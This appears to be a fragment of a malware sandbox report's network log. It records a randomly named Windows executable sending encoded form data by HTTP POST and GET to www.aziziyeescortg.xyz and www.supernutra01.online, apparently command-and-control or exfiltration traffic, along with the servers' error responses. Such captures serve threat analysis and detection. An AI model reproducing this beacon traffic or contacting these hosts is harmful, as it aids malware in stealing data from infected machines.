                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2299&min_rtt=2299&rtt_var=1149&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDP
                                                                                 Dec 14, 2024 13:52:37.562100887 CET | 392               | IN        | Data Raw: a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04
                                                                                Data Ascii: bUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUOl


                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                 38         | 192.168.2.5 | 50047       | 104.21.77.71   | 80               | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp                           | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:52:38.965279102 CET | 775               | OUT       | POST /2pcx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.aziziyeescortg.xyz
                                                                                Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 52 6e 39 4e 31 66 4f 4d 4b 63 41 35 76 73 42 55 70 63 33 4b 58 70 77 76 5a 6f 4c 34 38 43 45 31 54 62 6b 6e 73 66 45 41 72 6c 38 36 4b 58 44 2f 74 66 31 39 68 4f 34 62 47 49 35 43 4d 41 4b 43 69 36 39 54 51 30 5a 38 68 4a 66 79 61 47 4d 72 34 6e 6c 72 47 75 35 59 69 6c 49 43 4e 50 33 48 64 6b 75 67 2b 66 45 2b 30 2f 48 2f 34 37 73 67 2b 6e 6e 41 51 31 54 77 6a 4b 67 36 6d 30 6c 53 4d 6f 54 76 56 6a 6d 56 76 74 77 35 35 46 6f 59 66 62 4b 6f 66 2b 44 41 2b 4b 66 59 32 41 50 4c 54 55 67 33 64 77 48 61 63 69 63 73 61 51 6a 39 78 7a 68 35 6f 6d 72 34 76 68 69 79 6c 52 42 36 6f 76 44 34 71 79 32 50 55 4a 63 6a 2b 7a 42 4d
                                                                                Data Ascii: NVK8=btkQLzgK81PCRn9N1fOMKcA5vsBUpc3KXpwvZoL48CE1TbknsfEArl86KXD/tf19hO4bGI5CMAKCi69TQ0Z8hJfyaGMr4nlrGu5YilICNP3Hdkug+fE+0/H/47sg+nnAQ1TwjKg6m0lSMoTvVjmVvtw55FoYfbKof+DA+KfY2APLTUg3dwHacicsaQj9xzh5omr4vhiylRB6ovD4qy2PUJcj+zBM
                                                                                 Dec 14, 2024 13:52:40.212050915 CET | 1236              | IN        | HTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:40 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPboVlbiIlEiJ77EtGBwuLEPniM%2F9ip%2FaeDZzihrM5c6us%2ByOZAjVBM%2FCuszW6Y3%2B2URMDwYkcIwgSPp6sgLoaibstA0%2FYDU4cBeKEFjNCmjp9aP2rJPrs9Vw7dOhz7L0hZgNKMKCd5x"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e551539ba0f71-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTq
                                                                                 Dec 14, 2024 13:52:40.212095022 CET | 395               | IN        | Data Raw: 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60
                                                                                Data Ascii: DPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUO


                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                 39         | 192.168.2.5 | 50048       | 104.21.77.71   | 80               | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp                           | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:52:41.626995087 CET | 1792              | OUT       | POST /2pcx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.aziziyeescortg.xyz
                                                                                Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 52 6e 39 4e 31 66 4f 4d 4b 63 41 35 76 73 42 55 70 63 33 4b 58 70 77 76 5a 6f 4c 34 38 44 51 31 54 6f 73 6e 73 2b 45 41 35 31 38 36 44 33 44 38 74 66 31 38 68 4f 41 66 47 49 38 2f 4d 43 43 43 77 4d 4a 54 59 6c 5a 38 72 4a 66 79 56 6d 4d 32 6c 58 6b 68 47 75 4a 63 69 6c 34 43 4e 50 33 48 64 6d 47 67 34 4f 45 2b 32 2f 48 38 70 37 73 57 36 6e 6d 4f 51 31 37 67 6a 4b 55 71 6e 48 39 53 4d 49 44 76 5a 32 79 56 6e 74 77 37 2b 46 6f 51 66 62 47 4a 66 2b 66 6d 2b 4c 71 51 32 48 37 4c 43 53 70 74 45 79 62 4e 65 55 63 4b 57 77 44 51 6a 7a 31 36 69 6c 71 58 79 52 58 55 70 53 77 58 2b 61 33 34 76 52 32 48 4f 76 73 50 34 33 34 79 54 49 5a 4f 37 38 2b 4b 2b 4a 54 7a 4a 33 37 54 65 5a 4a 6e 70 35 76 74 6a 59 72 53 52 55 67 48 47 7a 59 53 2f 7a 4e 51 4b 6b 6f 65 36 6f 47 4e 63 6d 77 78 55 73 2b 54 66 4b 72 4c 64 6a 75 4c 6b 41 78 78 76 64 56 6f 4a 54 53 70 38 78 37 54 6a 55 6b 54 38 7a 67 44 39 47 34 4b 71 33 4d 2b 74 34 6b 77 43 6b 51 2b 51 4a 36 52 68 59 41 32 56 [TRUNCATED]
                                                                                Data Ascii: NVK8=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 [TRUNCATED]
                                                                                 Dec 14, 2024 13:52:42.888066053 CET | 1236              | IN        | HTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:42 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PsuVWMpeJZU9m6kSLOWms1e%2FnnocvBiyxkHoNuL7UhvQ753nQNNZLrtXlm5vjsTae21MMXrhWjYvVWa1ssF9AN0D78IGA1RQuHFY5F6VXZpQ1P4RdPXf8FqVPfd952jtEyhfiSt62X7"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5525eae743bd-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2202&min_rtt=2202&rtt_var=1101&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbU
                                                                                 Dec 14, 2024 13:52:42.888129950 CET | 387               | IN        | Data Raw: 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d
                                                                                Data Ascii: F[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUOl


                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                 40         | 192.168.2.5 | 50049       | 104.21.77.71   | 80               | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp                           | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:52:44.289949894 CET | 487               | OUT       | GET /2pcx/?NVK8=WvMwIEBZ0GXEfEVGpcmqJr8xhaJ22fvMS8l3C/jH9UlzXoFcq8ozyiMxUW2Crv9xh6g9FMonHDW5wf9fDGMh/a7sRXpo9EZKPLBX7XcfSv3IAkyUxscM38Xc6L1z4gDQDA==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                 Dec 14, 2024 13:52:45.556891918 CET | 1236              | IN        | HTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:45 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LHSWhAitLfHUaKY6Xkk5cCil0gL%2FBmUyPy53VhpBB1gnMpoLM3ziuZpe8%2FjZtSbhommSqt4khoUpxgVpvOD4XdQa5ED4s64EqvxU%2FPFygzN0tMf7TPjsFIkuYAjmkZXCxBDXZijRVm3c"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e55369e1e41e1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED]
                                                                                Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="t
                                                                                 Dec 14, 2024 13:52:45.556916952 CET | 878               | IN        | Data Raw: 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20
                                                                                Data Ascii: ext-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found


                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                 41         | 192.168.2.5 | 50050       | 172.67.220.36  | 80               | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp                           | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:52:51.031285048 CET | 758               | OUT       | POST /b156/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.supernutra01.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.supernutra01.online
                                                                                Referer: http://www.supernutra01.online/b156/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 42 58 4e 56 6a 32 66 52 31 32 77 46 30 57 46 45 2b 44 4e 6a 4f 38 53 67 47 74 6a 64 72 38 41 4f 63 65 51 45 36 5a 61 69 78 42 66 72 4d 4f 69 67 48 4f 54 71 77 55 79 4c 33 57 39 5a 49 44 50 4c 33 51 4a 6d 6c 67 4e 53 36 41 55 2b 66 6f 63 2b 39 41 2b 4d 37 53 4b 63 34 35 63 73 6d 51 4f 65 2b 2f 30 5a 32 69 4a 6c 42 75 75 6d 62 4d 73 54 53 39 61 59 56 4c 75 75 30 35 67 63 4d 69 74 36 38 45 38 54 44 6f 77 68 67 76 35 67 50 7a 71 4f 55 68 53 6d 4a 69 32 78 70 31 4a 65 6c 63 41 73 64 70 6c 46 42 37 36 58 42 71 72 6d 6d 6b 46 35 43 61 39 44 55 32 73 59 59 73 46 70 69 36 63 64 6a 74 76 37 62 53 4d 3d
                                                                                Data Ascii: NVK8=BXNVj2fR12wF0WFE+DNjO8SgGtjdr8AOceQE6ZaixBfrMOigHOTqwUyL3W9ZIDPL3QJmlgNS6AU+foc+9A+M7SKc45csmQOe+/0Z2iJlBuumbMsTS9aYVLuu05gcMit68E8TDowhgv5gPzqOUhSmJi2xp1JelcAsdplFB76XBqrmmkF5Ca9DU2sYYsFpi6cdjtv7bSM=
                                                                                 Dec 14, 2024 13:52:52.335288048 CET | 1236              | IN        | HTTP/1.1 405 Not Allowed
                                                                                Date: Sat, 14 Dec 2024 12:52:52 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwevaR86MSyJ2sZ7245t0JaTPHz0Pa0CObjG3Y7z%2FLus02BDrRBzDpnnpkV%2Baz%2BI4h5ofbyyaXeXJjdNnU8trIMmn0Th8z%2Fup5aZ4eQpArly0lINlZdk0lqTzYJ1fh8TUHdfnNLit46q%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5560a8ee5e7d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1658&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
                                                                                 Dec 14, 2024 13:52:52.335350037 CET | 123 | IN | Data Raw: 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e
                                                                                Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 42 | 192.168.2.5 | 50051 | 172.67.220.36 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:52:53.718107939 CET | 778 | OUT | POST /b156/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.supernutra01.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.supernutra01.online
                                                                                Referer: http://www.supernutra01.online/b156/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 42 58 4e 56 6a 32 66 52 31 32 77 46 30 31 64 45 38 67 6c 6a 47 38 53 6a 61 39 6a 64 68 63 41 56 63 65 4d 45 36 59 50 35 78 7a 4c 72 4e 76 53 67 4a 71 48 71 35 45 79 4c 76 47 38 64 56 54 4f 48 33 51 56 78 6c 69 4a 53 36 41 51 2b 66 71 45 2b 39 54 47 44 35 43 4b 61 35 4a 63 75 37 41 4f 65 2b 2f 30 5a 32 6d 70 4c 42 75 6d 6d 62 38 63 54 54 63 61 58 4a 62 75 74 78 35 67 63 65 53 73 53 38 45 38 4c 44 73 77 62 67 73 52 67 50 79 61 4f 54 30 2b 68 47 69 32 72 6e 56 49 74 71 65 6c 69 59 71 34 4b 42 59 4c 52 41 35 4c 37 6e 53 30 54 59 34 31 72 48 57 41 67 49 2f 4e 65 7a 4b 39 30 35 4f 2f 4c 46 46 5a 44 6a 72 51 77 6c 42 4f 72 6d 78 49 30 76 63 65 4a 46 51 56 37
